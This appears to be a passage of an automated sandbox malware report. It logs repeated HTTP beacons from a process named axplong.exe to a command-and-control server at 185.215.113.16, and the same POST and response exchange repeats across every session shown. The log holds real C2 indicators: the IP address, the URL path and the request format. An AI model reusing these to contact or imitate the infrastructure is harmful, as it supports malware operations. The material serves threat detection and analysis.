                  27192.168.2.549739185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:33.183466911 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:33.871776104 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:33 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:33.880419016 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:34.102134943 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:33 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  28192.168.2.549740185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:34.215152025 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:35.006129980 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:34 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:35.006886005 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:35.235718966 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:35 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  29192.168.2.549741185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:35.355457067 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:36.056668043 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:35 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:36.057486057 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:36.279582024 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:36 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  30192.168.2.549742185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:36.386394024 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:37.156671047 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:37 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:37.157522917 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:37.409873009 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:37 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  31192.168.2.549743185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:37.527626991 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:38.222038984 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:38 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:38.223140001 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:38.445768118 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:38 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  32192.168.2.549744185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:38.561274052 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:39.263372898 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:39 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:39.264466047 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:39.486574888 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:39 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  33192.168.2.549745185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:39.606348991 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:40.306037903 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:40 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:40.306946039 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:40.533605099 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:40 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  34192.168.2.549746185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:40.651848078 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:41.340588093 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:41 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:41.341696978 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:41.563433886 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:41 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  35192.168.2.549747185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:41.684864044 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:42.398369074 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:42 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:42.399060011 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:42.638597965 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:42 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  36192.168.2.549748185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:42.746433020 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:43.504317999 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:43 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:43.505405903 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:43.728470087 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:43 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  37192.168.2.549749185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:43.965764999 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:44.760117054 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:44 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:44.760895014 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:45.018640041 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:44 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  38192.168.2.549750185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:45.136738062 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:45.872601986 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:45 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:45.873878002 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:46.102363110 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:45 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  39192.168.2.549751185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
